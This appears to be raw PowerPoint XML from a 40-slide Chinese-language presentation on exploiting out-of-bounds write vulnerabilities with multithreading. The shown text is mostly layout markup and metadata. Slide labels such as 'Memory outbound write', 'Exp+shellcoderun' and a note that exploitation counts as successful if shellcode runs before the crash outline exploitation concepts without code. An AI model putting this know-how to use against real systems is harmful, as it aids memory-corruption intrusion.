            <a:srgbClr val="00B0F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Crashed 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8" name="右箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3889248" y="5623691"/>
            <a:ext cx="978408" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/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6010656" y="3743528"/>
            <a:ext cx="4204716" cy="733663"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory outbound write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8807" y="5200472"/>
            <a:ext cx="108057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/>
              <a:t>若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>exploit+shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t> run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>能够在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>之前完成，也算利用成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="右箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010656" y="1144976"/>
            <a:ext cx="2560320" cy="733663"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exp+shellcoderun</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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05154" y="45470"/>
            <a:ext cx="57246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600" dirty="0"/>
              <a:t>多线程利用越界写漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22073990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SLIDE_ID" val="custom20187308_1"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="title"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="pureTxt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  <p:tag name="KSO_WM_SLIDE_MODEL_TYPE" val="cover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2、3、6、8、10、11、12、15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自定义 4">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val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wrap="square">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill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4977</TotalTime>
  <Words>2291</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>421</Paragraphs>
  <Slides>40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4" baseType="lpstr">
      <vt:lpstr>ArialMT</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo-Bold</vt:lpstr>
      <vt:lpstr>Menlo-Regular</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana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Li,Kemeng</cp:lastModifiedBy>
  <cp:revision>121</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-29T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-20T02:30:31Z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2052-11.1.0.8612</vt:lpwstr>
  </property>
</Properties>
</file>